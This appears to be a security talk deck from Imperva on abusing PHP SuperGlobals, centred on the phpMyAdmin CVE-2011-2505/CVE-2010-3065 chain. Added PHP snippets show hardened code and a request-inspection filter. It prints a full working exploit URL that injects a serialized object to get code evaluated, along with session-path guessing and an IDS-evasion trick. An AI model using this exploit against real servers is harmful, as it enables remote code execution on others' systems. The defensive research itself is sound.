© 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals: Supersized Trouble
Shelly Hershkovitz, Senior Security Analyst, Imperva
Feb 23, 2016
Shelly Hershkovitz
• Senior Security Analyst at Imperva
• Leads the efforts to capture and analyze hacking activities
• Responsible for a number of Imperva's HII reports
• Experienced in machine learning and computer vision
• Holds a BA in Computer Science and an M.Sc. degree in Bio-Medical Engineering
How it all began…
• Bla bla… CVE-2011-2505
• Honeypots
Agenda
• Introduction
  • Relevant PHP background
• An Anatomy of a Modern Web Exploit
  • Abusing SuperGlobals
  • Demo
• Additional PHP SuperGlobal Attacks
  • In the wild
• Summary & Conclusions
• Q&A
Introduction
Relevant PHP background
Breadth and Depth of PHP – I
• The most popular server-side programming language in the world
• And goes from strength to strength
Breadth and Depth of PHP – II
• The most popular web applications are powered by PHP
Source: http://www.alexa.com/topsites
Outline – PHP Background
• SuperGlobals
• Serialization
• Session Management
PHP SuperGlobals
• "Local" versus "global" scopes
• Global variables
  • Cross-function communication
  • *ANY* function may change them
• SuperGlobals
  • Predefined array variables
  • Available in all scopes
• SuperGlobals: cookies, sessions, environment, etc.
PHP SuperGlobal list
  Variable   Definition
1 GLOBALS    References all variables available in global scope
2 _SERVER    Server and execution environment information
3 _GET       HTTP GET variables
4 _POST      HTTP POST variables
5 _FILES     HTTP File upload variables
6 _COOKIE    HTTP Cookies
7 _SESSION   Session variables
8 _REQUEST   HTTP Request variables
9 _ENV       Environment variables
External Variable Modification
MITRE Common Weakness Enumeration, CWE-473: "A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies".
SuperGlobals are a natural target:
• Exist in every PHP application
• Provide access to the server's core functionality
Serialization
• The process of saving data stored in memory to file is called "serialization"
• The process of loading data stored in file to memory is called "deserialization"
• PHP hooks: __sleep() runs on serialization, __wakeup() runs on deserialization
Image: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
PHP Session Management
New user:
• A unique identifier is generated for the session
• A cookie called PHPSESSID is sent to the user with this identifier
• A file is created on the server, for example: sess_1q8jkgkoetd3dprcb3n7mpmc4o26eili
Resuming a session: the session data is loaded back from that file
An Anatomy of a Modern Web Exploit
Exploiting SuperGlobals
Outline
• PHPMyAdmin
• CVE-2011-2505
• CVE-2010-3065
• Attack Flow
• Demo
• Attacks in the wild
PHPMyAdmin (PMA)
• The most popular MySQL administration tool for PHP
• Often bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations
Outline – PHP Background
• SuperGlobals
• Session Management
• Serialization
Related vulnerabilities: CVE-2010-3065, CVE-2011-2505
CVE-2011-2505: PhpMyAdmin Vulnerability
• Parses a given query string to local scope
• _SESSION variables are saved in the session's file on the server
Example request: http://www.super.com/somePage?_SESSION[username]=bad_stuff
Resulting entry in the session file: username|s:9:"bad_stuff";
CVE-2011-2505: PhpMyAdmin Vulnerability
• PhpMyAdmin's "unset session" functionality
• parse_str(): parses the given query string and stores the variables in the current scope
• session_write_close(): makes session data persistent throughout the entire user's session
CVE-2011-2505: Exploit
An attacker can now:
• Craft a malicious query string with the _SESSION SuperGlobal
• Injected _SESSION values override the session's original values
• New values are saved to the local file
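The parse_str()/session_write_close() interaction behind this slide, as an added illustration that is not phpMyAdmin's code: a one-argument parse_str() call at file scope lets a query-string key named _SESSION[...] land in the real SuperGlobal, shown beside a handler that parses into a local array and touches only the key it expects. handleUnsetRequest() is a hypothetical name, the query strings are constructed, and the script assumes a PHP version that still accepts one-argument parse_str() (deprecated in 7.2, removed in 8.0; the talk's attacks date from PHP 5).

```php
<?php
// Added illustration of the bug class behind CVE-2011-2505; not phpMyAdmin's
// own code. The vulnerable call sits at file scope on purpose: that is where
// a one-argument parse_str() reaches the global symbol table.

session_start();
$_SESSION['username'] = 'alice';

// Constructed query string, as in the slide's example URL.
$malicious = 'session_to_unset=123&_SESSION[username]=bad_stuff';

// --- Vulnerable pattern ---
// parse_str() with no target array registers every key as a variable in the
// current scope; at file scope that is the global symbol table, so the key
// "_SESSION[username]" overwrites what the application reads as $_SESSION.
parse_str($malicious);
echo $_SESSION['username'], "\n";           // bad_stuff
// In the vulnerable application a session_write_close() followed, saving
// this state to the sess_<id> file (next slides).

// --- Hardened pattern ---
/**
 * Removes the one session key named by the request and returns its name,
 * or null when the request carries no usable key.
 */
function handleUnsetRequest(string $qs): ?string
{
    parse_str($qs, $params);                // everything stays in $params
    $key = $params['session_to_unset'] ?? null;
    if (!is_string($key) || !array_key_exists($key, $_SESSION)) {
        return null;
    }
    unset($_SESSION[$key]);                 // only the named key is touched
    return $key;
}

$_SESSION = ['username' => 'alice', 'token' => 'abc'];
var_dump(handleUnsetRequest($malicious));   // NULL: no session key "123"
var_dump(handleUnsetRequest('session_to_unset=token')); // string(5) "token"
print_r($_SESSION);                         // only username => alice remains
```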
CVE-2010-3065 PHP Vulnerability & Exploit
• Discovered by Stefan Esser – late 2010
• Attacker can write data to the _SESSION in *ANY* format, if the session variable name starts with '!'
PMA Session deserialization: Vulnerability
• On session deserialization, the load() function is called
• Eval is evil!
  • Can be used to execute unexpected code
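The serialization hooks from the background section and this slide's __wakeup() → load() → eval() chain, as an added illustration that is not phpMyAdmin's code: VulnerableConfig imitates the pattern the slide describes (class names are assumptions; the load() method and source property follow the slide), and the rest shows two ways to keep unserialize() from ever running such a hook. Assumes PHP 7 or later for the allowed_classes option.

```php
<?php
// Added illustration, not phpMyAdmin's code. VulnerableConfig mirrors the
// pattern described above (the talk's real class is PMA_Config):
// unserialize() triggers __wakeup(), which calls load(), which eval()s
// whatever file the attacker-controlled "source" property points at.

class VulnerableConfig
{
    public $source;

    public function __wakeup()
    {
        $this->load();                      // runs on every unserialize()
    }

    public function load()
    {
        // Eval is evil: the file contents become PHP code.
        eval('?>' . file_get_contents($this->source));
    }
}

class HardenedConfig
{
    public $source;

    // Defence 1: a config object has no business being rebuilt from a
    // serialized string, so refuse it outright instead of loading anything.
    public function __wakeup()
    {
        throw new RuntimeException('HardenedConfig must not be unserialized');
    }
}

// Constructed sample blob: an object whose source is a bogus path.
$blob = 'O:14:"HardenedConfig":1:{s:6:"source";s:18:"/tmp/not-a-real-fp";}';

// Defence 2 (PHP 7+): allowed_classes => false stops unserialize() from
// instantiating any class, so no __wakeup() hook of any class can fire.
$obj = unserialize($blob, ['allowed_classes' => false]);
var_dump($obj instanceof __PHP_Incomplete_Class);   // bool(true)

// Legacy callers that still pass only the string are caught by defence 1.
try {
    unserialize($blob);
} catch (RuntimeException $e) {
    echo 'blocked: ', $e->getMessage(), "\n";
}
```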
Attack Flow
1. An attacker sends the 1st request to receive a cookie
2. An attacker sends the 2nd request; _SESSION now holds:
   1. Malicious code
   2. A serialized PMA_Config object with source = session file path
   PHP saves the session's information to a local file
3. An attacker sends the 3rd request
   PHP unserializes PMA_Config, which calls __wakeup(), which calls load(), which calls eval(source = session file)
The Exploit Code on the Web
Guessing Session Filename
• Luckily for the attacker, the location of the session file is predictable
• The session file name consists of
  • The "sess_" prefix
  • The session identifier – known to the user/attacker
• The file's path is predictable: default values
Guessing Session Filename: in the wild
• Multiple guesses for the path of the same session file ("sess_19qq…")
The Final Exploit
Now the attackers can, *FINALLY*, get their code evaluated:
/phpMyAdmin/index.php?session_to_unset=123&token=86498ff0a666f808df76ffaabee9b7a3&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:59:"/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62";}}&_SESSION[payload]=<?php phpinfo(); ?>
Demo
PMA SuperGlobal Attacks in the wild
• The attack source is a hacked server
• It attacks (at least) two other servers
• The attacks persist over half a year
A Modern Exploit Summary: Research
• Sophisticated research
• Combines multiple vulnerabilities and issues in multiple domains
  • PHPMyAdmin (PMA)
  • PHP internals
A Modern Exploit Summary: Development
• Exploit packed in a single, "click once" PHP script
• Automates the different attack stages
• Can be launched from infected servers to infect others
PHP SuperGlobal Attacks
In the wild
SuperGlobal Attacks Targets
• RFI (Remote File Inclusion): trying to overwrite "_Server[document_root]" to point to an external resource
SuperGlobal Attacks Targets
• Part of general scanning against the site – Nikto, Acunetix, Nessus
• Intrusion Detection System filter evasion: an alternative way to represent HTTP query parameters
  • The "_REQUEST[Itemid]=1" request parameter is equivalent to "Itemid=1"
  • However, it evades a naïve IDS signature that blacklists "Itemid=1"
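A pre-filter a defender can run before signature matching, added here as an illustration (not from the talk or any product): it flags every request parameter that names a PHP SuperGlobal and rewrites it to the plain form a vulnerable application would register, so a rule written for "Itemid=1" also sees the "_REQUEST[Itemid]=1" spelling. The constant and function names are assumptions, the sample query strings are constructed from the talk's examples, and the code assumes PHP 7.1 or later.

```php
<?php
// Added detection helper; not from the talk or any product. Constant and
// function names are assumptions, and the sample inputs are constructed.

const SUPERGLOBAL_NAMES = ['GLOBALS', '_SERVER', '_GET', '_POST', '_FILES',
                           '_COOKIE', '_SESSION', '_REQUEST', '_ENV'];

/**
 * Inspects a raw query string before signature matching.
 * Returns ['alerts' => [...], 'normalized' => 'name=value&...'] where
 * "_REQUEST[Itemid]=1" has been rewritten to the "Itemid=1" form that a
 * vulnerable application would actually register.
 */
function inspectQuery(string $rawQuery): array
{
    $alerts = [];
    $normalized = [];
    foreach (explode('&', $rawQuery) as $pair) {
        if ($pair === '') {
            continue;
        }
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $name = urldecode($name);
        $value = urldecode($value);
        // Split "_REQUEST[Itemid]" into the array base and its first index.
        // The base is compared case-insensitively: PHP itself is strict, but
        // scanners in the wild spell it "_Server[document_root]" and similar.
        if (preg_match('/^([A-Za-z_]\w*)\[([^\]]*)\]/', $name, $m)
            && in_array(strtoupper($m[1]), SUPERGLOBAL_NAMES, true)) {
            $alerts[] = sprintf('SuperGlobal %s targeted via parameter "%s"',
                                strtoupper($m[1]), $name);
            $name = $m[2];
        }
        $normalized[] = $name . '=' . $value;
    }
    return ['alerts' => $alerts, 'normalized' => implode('&', $normalized)];
}

// Constructed samples based on the talk's examples.
print_r(inspectQuery('Itemid=1'));              // no alert, unchanged
print_r(inspectQuery('_REQUEST[Itemid]=1'));    // alert; normalized Itemid=1
print_r(inspectQuery('p=1&_Server[document_root]=http://attacker.example/'));
print_r(inspectQuery('_SESSION[username]=bad_stuff'));
```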
SuperGlobal Attacks Targets
During May 2013:
• 3.5K requests that manipulated PHP SuperGlobal variables
• 27 different attack sources
• 24 web applications as targets
Targeted SuperGlobal
• Some SuperGlobals are more targeted than others
• The more targeted SuperGlobals provide access to more sensitive resources
Share of attacks by targeted SuperGlobal:
• GLOBALS: 55%
• ENV: 14%
• SERVER: 14%
• SESSION: 13%
• REQUEST: 4%
Summary & Conclusions
Third-Party Code Perils
• PHPMyAdmin:
  • Popular utility installation
  • Often bundled with other applications
• Even if PMA is not used, the server is exposed to code execution attacks!!
• Administrators might not be aware of all bundled software
• An "opt out" security model is needed
• One solution is a Web Application Firewall (WAF) with constant updates of security content.
Conclusions
• Establish a positive security model
• Use layered security mechanisms
• Beware of third-party code perils
• Block SuperGlobal parameters in requests
More information in HII: http://www.imperva.com/resources/hacker_intelligence.asp
Q&A